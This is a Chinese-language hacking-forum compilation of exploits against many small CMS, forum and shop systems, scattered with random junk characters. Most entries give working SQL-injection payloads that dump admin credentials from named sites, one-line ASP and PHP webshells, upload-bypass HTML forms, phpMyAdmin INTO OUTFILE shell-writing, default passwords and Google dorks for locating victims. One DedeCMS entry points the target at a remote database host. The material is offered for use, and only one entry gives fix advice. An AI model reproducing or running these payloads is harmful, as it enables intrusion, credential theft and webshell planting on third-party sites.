启航企业建站系统 cookie注入漏洞通杀所有版本/ V8 Q: y: C# Z- h, j7 |
* j; L) L$ E+ M4 Z$ |1 y8 e直接上exploit:" ~& {- l) V; c) q* a
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
c* r1 a7 D$ d6 p/ ntest:http://www.tb11.net/system/xitong/shownews.asp?id=210
( e# w: z: R, e/ S3 i% w) {--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 |- S B. r" \ P; ?0 I
Asprain论坛 注册用户 上传图片就可拿到webshell
2 m' w( D+ T$ W) K7 g, l) i6 \& A g/ A& V" ^9 z
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。) }9 j: c( j8 a' r1 W: z
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
. p3 i7 N& L' \( H7 I2.gif 为一小图片文件,一定要小,比如qq表情图片
) K- P) C5 q' ~; F3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
D+ p9 Q. F9 N9 r. o4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
. Q {. w3 i2 Q8 Q5.q.asp;.gif
' [# \9 ] u Q) Ygoogle:Powered by Asprain! F- E+ _: k. `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# V# L+ q v7 c5 C$ o
6 w' q3 D; a/ A; {ShopNum1全部系统存在上传漏洞。$ Q. e4 i# C/ @" k" x7 s* b, V
5 H4 P) E6 C: O6 t9 S8 G
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
/ q0 e, m" E8 l) A) U/ B9 D# c }按说明 提示登录后台。。
( l5 Q6 p# Y" \: i在后台功能页面->附件管理->附件列表. d$ t5 T8 @) {$ ?% U" @3 c4 p
可以直接上传.aspx 后缀木马
! x( b$ c. y' _; jhttp://demo.shopnum1.com/upload/20110720083822500.aspx8 R: w& ^% g2 L: D$ j+ S+ X' A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 n# P0 q6 o- Z
; ]+ r' R! ^6 C& f; r. N1 C. ~
牛牛CMS中小企业网站管理系统 上传漏洞: \+ m( R+ E9 {* v" X% O. J0 e
$ t4 e, d4 G4 V9 J. U2 ^牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
6 c7 m! H; t; D3 d& u后台:admin/login.asp
+ X8 u2 \2 N! H! y2 r& Iewebeditor 5.5 Nday
9 T" ~, g) P) Q* n kexp:
# s4 I H5 r9 g: g; t<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
+ @4 a$ g/ Y! F) r5 `6 _<input?type=file?name=uploadfile?size=100><br><br>?
E/ H" k3 b4 J3 ]- T; \ }<input?type=submit?value=upload>?
5 p2 }$ m; R5 H6 j</form>. P6 [) S4 R6 J( z' a6 O3 ]5 }
ps:先上传小马.
7 L4 N) t# |' n; g* O: a9 B# Uinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
( B5 v0 h! K# D8 R2 [
+ L9 a3 v4 ]! p4 n1 {4 ?# d--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. Q* b/ \7 u* |- t* f) `
, g+ A8 {: k) v- K7 ^: iYothCMS 遍历目录漏洞
c* @6 r- A8 K8 C
+ i1 X6 K( w$ I8 c# ^* Y优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
- N) R: Z- ^- R2 F默认后台:admin/login.asp/ [! Q, t& r- N% s8 i3 i g
遍历目录:
4 x5 a, P/ m8 T3 e3 W- gewebeditor/manage/upload.asp?id=1&dir=../
0 }+ e5 r% ^' H1 U6 Z' Hdata:6 J( @2 j) I' h+ c. g& E+ g
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa/ I" S8 M- k' `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' d$ ]1 p( s+ Z. [/ m
, d5 a+ l$ s9 q! `3 U8 H2 H$ KNet112企业建站系统 1.0
* b) m# g2 G0 f! K1 l9 O
, P' Y! f1 g5 K% x ?4 L/ e/ |源码简介:; n5 y* b2 o; O$ q, @
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
% l1 y8 K2 \ x! ?添加管理员:; @- T: G. O" ^+ B" l2 j
http://www.0855.tv/admin/admin.asp?action=add&level=2
" Y* |+ p& |- D其实加不加都不是很重要,后台文件都没怎么作验证。
- ?/ ?, a$ I. n ^/ t4 R, \+ g% o上传路径:
# [8 s3 L7 H) X" w3 @$ Uhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2009 l( Y- ^6 {& h
http://www.0855.tv/inc/Upfile.asp?Stype=2
" H( h" r# i. O0 K$ T+ V/ t怎么利用自己研究。
1 \$ K8 B) z6 J7 V" d; U" y$ ^遍历目录:2 E3 W! d: b8 ]
http://www.0855.tv/admin/upfile.asp?path=../..5 ?6 n/ y$ K0 v
如:
) G' W. M) t# K" H' xhttp://www.0855.tv/admin/upfile.asp?path=../admin u5 \5 _4 H2 k6 l* q& t
http://www.0855.tv/admin/upfile.asp?path=../data0 a9 E. M6 [3 A, P6 q* A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! ?4 Y8 J8 j+ `6 s
6 \4 R! ^' G; [ z* }9 t易和阳光购物商城通杀 上传漏洞$ \# p( d6 q* F8 W1 {/ |" g
. N( I% \* ~1 U前提要求是IIS6.0+asp坏境。3 M1 p& H: o( W" H) @7 W
漏洞文件Iheeo_upfile.asp
4 h, @& A& c4 X# m/ i# z5 |- [过滤不严.直接可以iis6.0上传
1 K% M8 z6 _( c6 O把ASP木马改成0855.asp;1.gif- S6 f8 R a% _+ X6 W6 x m
直接放到明小子上传7 O* E0 l. `( m5 _* K2 x* t0 Y$ G" _
Google搜索:inurl:product.asp?Iheeoid=
' v/ l5 A( D6 I" e) h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" {' ]" {" E# L( U% z6 u" M7 z; m
( r! |4 G% @" e" H% ~. j, Sphpmyadmin后台4种拿shell方法
6 y+ J* I% S! `9 _6 \8 Y4 B; N- m. m$ C: x4 |
方法一:
6 i" k, v, [0 p7 Z7 q, Z+ aCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );0 `- V/ t& o/ F' Z5 j8 N4 o4 ^
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
+ y4 n$ |. R8 K# H* n" B+ t+ C! xSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
: t. w3 m8 e* g( D$ Q----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
0 K/ k, z3 a! Z3 ]- C一句话连接密码:xiaoma7 B; D7 _. l: [1 ^! v: ?; k& G
方法二:
; r! B" j! A4 ICreate TABLE xiaoma (xiaoma1 text NOT NULL);
- u9 s% B, C6 K& j" `Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
, ~6 d* S4 V" W, m! P! Cselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';1 z5 M4 F9 W- s4 ^6 c
Drop TABLE IF EXISTS xiaoma;
$ @3 u8 O3 Y' ~4 S" u% c方法三:
* V& x+ H* H' F; R) u) g& F; L读取文件内容: select load_file('E:/xamp/www/s.php');
" m3 J) [! _% |写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
5 P, }+ z$ k. e* m: Hcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
; k5 N# e0 v: g3 w方法四:
" C0 D+ d" i' f# ~6 wselect load_file('E:/xamp/www/xiaoma.php');6 B( N6 L' J0 P F
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
) P) I+ j7 {- q9 m9 \5 U8 ^0 S1 `& f然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir( N2 s2 |/ L- r4 m1 S4 R2 u
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& v X1 W( R) B" `4 o; w9 t: {* U9 M e
传信网络独立开发网站源码0day漏洞* \1 O- k8 ?; T6 Z
, ^+ V$ J/ W. ?' H# ~: w后台system/login.asp8 V: c& W# I: \! V
进了后台有个ewebeditor
4 Q2 o" n+ ]& k3 L# tGoogle 搜索inurl:product1.asp?tyc=% R" U( h6 V6 t0 v' q, A
编辑器漏洞默认后台ubbcode/admin_login.asp
& A0 j5 W" G$ |" c& m" P数据库ubbcode/db/ewebeditor.mdb
0 o- W4 R+ N7 L* [2 x3 C! M( L默认账号密码yzm 111111
* D' O3 P" T+ u i2 d' Y" W7 j
% h5 d' j7 O* b0 [! R% N拿webshell方法. e, w9 {1 S: F1 W! C! a
登陆后台点击“样式管理”-选择新增样式 : v+ L1 z$ K8 b. N
样式名称:scriptkiddies 随便写 8 v" k* D; r* Q6 C
路径模式:选择绝对路径 # x7 `: N- b4 }0 y$ u/ D6 t
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
9 u) f% p, i4 ^8 d图片类型比如就是我们要上传的ASP木马格式7 e) o% d2 U2 @) O
上传路径:/
; c( |$ v7 |- L) v4 p! A' d图片限制:写上1000 免的上不了我们的asp木马; p" Y* Z% D8 ?0 {, n! u( j
上传内容不要写7 e* O$ ?% |& F3 `3 q& a8 {6 \6 W( v5 n
可以提交了
( ?, D& p5 j J) _7 [7 j3 f样式增加成功! 3 B+ o1 ?6 ], [* `3 T" ^2 y! n
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
$ F0 x% Q) \5 }6 l# c按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置& Y' [* X2 x$ d9 E/ z1 Y6 }
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
R* v* ^- R" }% |上ASP木马 回车 等到路径
+ b) q% Z2 q7 J& y9 B# f
) G6 E+ H8 D4 p后台:system/login.asp2 K5 Z3 d" {* N. W0 M3 z
Exp:. B R* S( Q, y$ d4 b; a
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
9 |6 o, z) m; X& X$ d0 y- p测试:
6 \% _7 a! t5 ]3 Khttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
& S. k0 R& S# [5 \0 p. Shttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
. W5 r4 S2 D8 T# Q0 S: r; V--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ X' O" N4 J% Z( d/ \% y
6 e/ ^/ G$ F+ B6 s* A
foosun 0day 最新注入漏洞7 q. ]& s& w p7 g' u: B1 m" G& ~" C
T# _. l5 s9 U: N8 q: f/ D
漏洞文件:www.xxx.com/user/SetNextOptions.asp) y2 ^( q9 d4 }3 H7 F5 I4 [7 j! }
利用简单的方法:
3 J9 O) i) R, U3 K5 X+ C) s/ ~* ^暴管理员帐号:
% k1 E4 ], w3 Q+ r* C$ Z' q+ k2 ~/ ohttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin% B( D" C8 k4 H0 u& n- B( ~
暴管理员密码:& o q9 d; ~; P$ i8 ?6 ?
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,- f6 r5 @/ A/ H J4 m, m
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- J+ Y! R" T( t! d; g% z% k
8 [# Z9 D3 w, M- D2 Y( U网站程序的版权未知!9 a" D3 l1 H1 d9 k7 {7 e9 L
8 c% f- q4 o+ ^5 n; X, U3 H) F
默认网站数据库:
2 Y- f2 K, g& z1 M7 r" V* f7 W/ _% Swww.i0day.com/data/nxnews.mdb: e, r/ i* E" a @
ewebeditor 在线编辑器:5 j% u$ Y" b- Q
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
# u& ?2 {3 s) g* m% Z% G6 \) X5 Q0 M登录地址:ewebeditor/admin_login.asp
) F6 I8 v/ x0 g9 ?默认密码:admin admin1 W9 K! K9 x3 n! G; X$ w" Z6 P
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data- M8 p4 `' g6 S, z8 }2 L( r& |
, _! u" C/ d- d! |7 z8 y
Sql注入漏洞:
& V$ [8 s) m8 I D- u9 nhttp://www.i0day.com/detail.asp?id=128 _" f% O1 M }8 j& |. v9 k
exp:. k0 h# W, F* B( @- i+ i3 W
union select 1,admin,password,4,5,6,7,8 from admin2 \# Q# m }# ? P! t
爆出明文帐号/密码+ K1 S- q, j# {$ }$ U- \" W8 |
- v) e0 Y: @& S
上传漏洞:
+ @0 N! o; h! |6 \! |% F% M后台+upfile.asp
) A1 v- U4 R- t- H% O# n6 L" d如:/ N) z( N' M# t. `1 O
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
9 t6 o& D7 G* `0 r7 q- F% p$ Eshell的地址:网址+后台+成功上传的马
2 E: |) d" \* ]2 Pgoogle:inurl:news.asp?lanmuName=
- p3 ]9 a1 \8 C1 v9 r. c5 @. ]7 A3 o------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 O5 j3 [1 ]* I1 T- q. Z$ S! ~- |
5 O9 @% S6 h* A+ h0 ~dedecms最新0day利用不进后台直接拿WEBSHELL
. k* k/ x# J9 q0 H- O" n9 ~* U
% D a/ r# y$ S* D& s拿webshell的方法如下:
. \1 c1 k# W; x4 d) Z; k2 V4 b网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell./ N' m0 D& g0 m: B3 J; R3 {
前题条件,必须准备好自己的dede数据库,然后插入数据:
3 U$ Q$ d) @! N- Y( s0 Qinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
1 S4 F- z6 ^2 m2 _% ]" e
+ ]' a/ F3 Z9 ^4 B" o9 j4 F再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
, I) \: S( S( W<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
/ _0 O$ W2 O, r- p+ x2 P* m<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />$ [- T% \6 F) z! S' V8 s
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
5 M8 H# a4 C& B/ a# @6 O<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />' @2 Q" d3 U; Q) ~! [
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 ~7 @ S8 |3 x L<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />5 Y+ |+ e: D, a+ i* K. }$ ?/ {
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />. Y9 ~7 V [; U! ^: O* Y* I
<input type="text" value="true" name="nocache" style="width:400">
, G; @ _, c( q<input type="submit" value="提交" name="QuickSearchBtn"><br />
8 W n. I5 r1 R, V</form>: j2 f5 @& D& I3 U" J
<script>. L; h) `1 h5 C) l; [
function addaction()
* @% }" f( {) A) B: T{% k, y8 b' V! d& V+ v9 [
document.QuickSearch.action=document.QuickSearch.doaction.value;: I( z# c% l$ |! L
}7 v& o3 {4 W3 C2 F9 |7 r. Y& G
</script>
2 G M, C/ m5 b-----------------------------------------------------------------------------------------------------------------------------------------------8 p8 j7 g0 M0 A' H" r
& e4 H# m+ X! N2 A# c' b
dedecms织梦暴最新严重0day漏洞
6 N. y0 _; U0 b$ ^% H. Gbug被利用步骤如下:
9 R, ?3 M$ O# hhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
5 \9 y2 P# p2 _( z把上面{}上的字母改为当前的验证码,即可直接进入网站后台。* Z- S$ Z8 ^9 B! _+ T q8 V- @- s% F
-------------------------------------------------------------------------------------------------------------------------------------------
. |2 S+ ]& ^# [$ @+ e9 ]* ]; g1 A7 B0 W8 r. [4 }0 c3 J
多多淘宝客程序上传漏洞
2 y- C; O: H. z6 O, c漏洞页面:1 V' q q' D3 K F4 d4 @
admin\upload_pic.php
2 G. ^( m7 I2 C" j) k: V传送门:8 m. _$ x6 J% z4 r5 e
http://www.www.com/admin/upload_pic.php?uploadtext=slide1, a, T& V; h: r8 n7 x
PS:copy张图片马 直接 xxx.php 上传抓包地址!
& D/ h( I: m( I* v k, D5 T------------------------------------------------------------------------------------------------------------------------------------------------------: q6 V7 h# M, S/ C) U$ k
) b' ~5 B( e {: m8 D- o5 _
无忧公司系统ASP专业版后台上传漏洞# Z) t* b" c9 v7 g/ c% q1 ~6 y
漏洞文件 后台上传
$ ~3 u% Q5 ^1 i. hadmin/uploadPic.asp: ?4 }& l' J3 |9 l
漏洞利用 这个漏洞好像是雷池的% R* g) c/ s! i
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
# h( B: O4 W3 i7 q3 S9 l9 u B0 E等到的webshell路径:
. @7 v5 k/ C6 l* ]2 w/UploadFiles/scriptkiddies.asp;_2.gif, S# B% P& f8 d- X) ~3 e' o6 c" c
---------------------------------------------------------------------------------------------------------------------------------------------------, M l0 ~, k! l
A$ K; ` g6 R! t6 E
住哪酒店分销联盟系统2010* U x" S) D4 f3 E/ j
Search: ]! b& p9 t' A+ x. a; k J
inurl:index.php?m=hotelinfo
0 a1 Q# v+ D* j* f: h3 ghttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
4 d0 k' c6 @5 ]5 g. I! P! p8 ~默认后台:index.php?m=admin/login5 G) t7 g# y! {0 ]. B
--------------------------------------------------------------------------------------------------------------------------------------------------
" \( e4 l4 l# H6 F1 ], V% v. W0 ^6 |4 w0 j+ m2 `
inurl:info_Print.asp?ArticleID=
* ?+ ^% w* N; c8 o后台 ad_login.asp
5 F. }2 B; @9 W! }2 t! x; {4 ^爆管理员密码:) l" `1 U7 ?4 \. X4 k, `, T
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
: Y! [3 {* J7 M3 A x2 [------------------------------------------------------------------------------------------------------------------------------------------------------------
( W# P( g' u9 `2 i/ I7 f( Q! P% Z, W$ H' b* I
搜索框漏洞!
3 j% ?9 ?6 f" Z+ i- G%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='6 j g) g0 F% s/ x8 X0 i7 N- ]
--------------------------------------------------------------------------------------------------------------------------------------------------------4 @. t4 l5 |/ o) c4 c0 e! b+ s9 q
* }/ b# |1 E8 U6 H) r; o' y关键字:5 R& T! j1 R5 e) r. `# [
inurl:/reg_TemletSel.asp?step=27 M/ B; K2 t( }* h; j0 |
或者$ d3 i: B& M! N6 s/ R* x6 @
电子商务自助建站--您理想的助手
4 m. L. [: h& K' e4 v-------------------------------------------------------------------------------------------------------------------------------------------------. e: U0 R) ?( x$ e4 }
5 T2 q: D+ D1 G5 y, |9 y5 s- tiGiveTest 2.1.0注入漏洞
5 ]& |( b/ T# Y7 B* C$ kVersion: <= 2.1.0# i* u2 B; y$ a; |
# Homepage: http://iGiveTest.com/
8 F! W6 a. F3 E/ y2 U+ x谷歌关键字: “Powered by iGiveTest”3 p# U" g3 t/ }* r/ H) ]2 z
随便注册一个帐号。然后暴管理员帐号和密码3 ~4 V% O/ V# `) [" j! e1 D* z
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
2 Z) R! m. l2 [! D( c9 Q------------------------------------------------------------------------------------------------------------------------------------------------
& o9 I3 Y, x. X% N6 ]4 Y
( Q: {- U3 |8 k! s5 r& zCKXP网上书店注入漏洞2 U; f9 W* M, t" g9 i
工具加表:shop_admin 加字段:admin) P5 ?" ~0 x$ H; Y4 S
后台:admin/login.asp
. Z$ D. A8 J$ \: c+ v登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
4 E, |3 o& s: C3 sinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
% p" S8 ], n2 L4 y. H- B C7 W, \) g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 y9 {1 ~& ^' A( J8 s' H
( q g; ^- I; k2 |
段富超个人网站系统留言本写马漏洞
+ S3 `' Y8 @ Q+ k, U源码下载:http://www.mycodes.net/24/2149.htm
" F' m9 n/ v0 @/ h6 laddgbook.asp 提交一句话。 K$ a- T( ~5 ?; {9 f7 F% \
连接: http://www.xxxx.tv/date/date3f.asp# M5 q" N3 E* b. L, p. M
google:为防批量,特略!% j% _) ]' {5 X
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------! b) Y7 S. E+ x
4 G- B. G* L6 x, [
智有道专业旅游系统v1.0 注入及列目录漏洞
U, q; H; ^! |: i) v3 E默认后台路径:/admin/login.asp# f2 U1 N+ j" Z& _2 }8 e j
默认管理员:admin% S1 g' \ r) A9 g4 q# t% J# g
默认密码:123456% `4 ~8 K1 C! [* ~3 J
SQL EXP Tset:
. I4 \+ {& U& t/ ^$ ^" |* chttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin4 H n* o- Q; n, }; _ [ m+ L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& I; Z; A' W4 g/ u" r6 X1 x; V" W; B+ w! l8 B6 L: p2 D
ewebeditor(PHP) Ver 3.8 本任意文件上传0day1 x; n! h# }" ?' O( y# q! l
EXP:
0 W) I- Q2 d* q1 v<title>eWebeditoR3.8 for php任意文件上EXP</title>
' Z0 H ?& u0 {: I8 F& R$ H<form action="" method=post enctype="multip
4 _) z0 _$ O8 l4 M6 K; Vart/form-data"> 7 [0 ~6 D6 X/ z, E1 J1 Z1 y- `
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> / I7 C! Q, ]/ P. L+ c
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
3 s: u# [/ @6 q2 z# B, f; O<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
( y6 t. }4 h& o7 l( T1 Yfile:<input type=file name="uploadfile"><br> ! L5 u( X! L4 @; M2 T; y0 P6 u
<input type=button value=submit onclick=fsubmit()>
1 l. c1 x2 j$ j( w0 p& V2 O; o</form><br>
# A- a' P* E3 d: v% c( F<script>
% ]0 [- u7 h+ V$ v) g7 |function fsubmit(){
! o) g- z, ^/ ?5 C' Dform = document.forms[0]; 7 ]" B; H( A2 T
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ; ^5 M5 V. v2 P4 |. r. p: U
alert(form.action);
: @) \; k9 J P9 V3 \" Fform.submit();
`( N& |8 }. o1 p/ t}
2 A& }8 E, B$ k6 Z( L5 `</script>
6 A# T6 e5 ~# `1 {5 X8 U" g注意修改里面ewebeditor的名称还有路径。
; h+ ~' v! w% v1 _; N& X---------------------------------------------------------------------------------------------------------------------------------------------------------------------------! C2 q/ O* C- A) \
1 i0 _* O2 @" H* Y# Q2 i* Z提交’时提示ip被记录 防注入系统的利用9 `! G5 P% z# b# m* v7 n/ L0 e
网址:http://www.xxx.com/newslist.asp?id=122′
5 ?8 R0 h: O* H5 {- }2 e) c提示“你的操作已被记录!”等信息。
! z1 Z% \# Q' H% x% k利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。) G, ^, I' @5 s3 V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 p9 `% Z# |. e6 k' c& a, T4 q: z$ e# c8 @# w
西部商务网站管理系统 批量拿shell-0day( w/ d8 r& _6 G1 Y9 ~, u
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
( s# n5 P2 q$ u7 r- \& U% F1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛& t( l5 v( A2 n! G
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合/ m7 v8 t) r" K9 T" P0 @5 M
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂* ?$ a1 P4 e k: h
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ z" F9 r0 I6 s
+ \: O( K2 |2 S3 _
JspRun!6.0 论坛管理后台注入漏洞( U* O' x' ~5 q4 _& D# B# `# {
6 U: a J9 `% C9 \2 lSEBUG-ID:20787 发布时间:2011-04-30 影响版本:: e$ }5 } ?' o6 F1 I
JspRun!6.0 7 d5 R* o: j- @% D& y. m- `, i
漏洞描述:
" s2 G, G8 \3 a/ ~2 s. A; YJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
4 Y4 U, ]1 Q3 g5 f- H在处理后台提交的文件中ForumManageAction.java第1940行6 R3 E i1 i, V5 t$ i$ i, T# u% a, X
String export = request.getParameter("export");//直接获取,没有安全过滤
& a% L( y# r5 y3 uif(export!=null){7 |+ H z4 j/ J( ~9 C$ E
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
( f; s! b2 [$ k4 wif(styles==null||styles.size()==0){* {5 d- d8 N8 g( \
<*参考* A- x; W) y5 Y
nuanfan@gmail.com
4 [* U( s! @6 V5 N*> SEBUG安全建议:
7 k% U! D& ], vwww.jsprun.net
+ m2 F5 L, o" l5 B(1)安全过滤变量export
& T4 o7 [9 n- o9 m2 }% @2 r(2)在查询语句中使用占位符
7 E/ u3 g" I4 u/ Z------------------------------------------------------------------------------------------------------------------------------------------------------------------------------" K! q j. q: B! M% r8 F5 d/ d! v
* x# F: U% ?5 S$ O2 w
乌邦图企业网站系统 cookies 注入
* y& f+ c# G6 c4 a9 s( m; L5 l: @
% _& p( e$ i% a r7 c" [程序完整登陆后台:/admin/login.asp9 x* U; f7 g: v$ J1 w
默认登陆帐号:admin 密码:admin888
1 X: i" }6 F5 \0 j* T( e( _语句:(前面加个空格)( H+ ^( `8 K8 }& U T; i+ M
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
Y, D7 q. H: h/ g4 f/ B或者是16个字段:4 B1 E! z) X* I
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
% [* g9 d2 A8 U2 N7 O( Z7 ^爆不出来自己猜字段。
w2 J- X, s; U" |注入点:http://www.untnt.com/shownews.asp?=88
& ^6 W$ \# r- C2 d6 e2 |getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
- K; o" q- S$ ?关键字:
# I1 W1 C. |3 l( \: q. Z# Dinurl:shownews?asp.id=
+ J" D7 \9 [, `( F( O( q& a* U-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 p1 w: l; Y4 X0 }- D( P ?$ Q
U) |* S3 S$ {) RCKXP网上书店注入漏洞& X; \/ G" ?0 O3 l* w
) G2 ]" R" M8 i6 a
工具加表:shop_admin 加字段:admin# v! U) V3 p7 b. b
后台:admin/login.asp 7 Z" r ?; D( L
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ Q; f' u( b1 H7 qinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息: Y x! v; [) g/ R$ p$ _( e
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& Q) W. R, `. K% w
! _( K0 C3 q/ b1 i6 yYxShop易想购物商城4.7.1版本任意文件上传漏洞
/ H2 R2 @9 d& H2 t2 N4 g+ C! \3 P6 ]' J Y4 M4 k: ^7 A( m
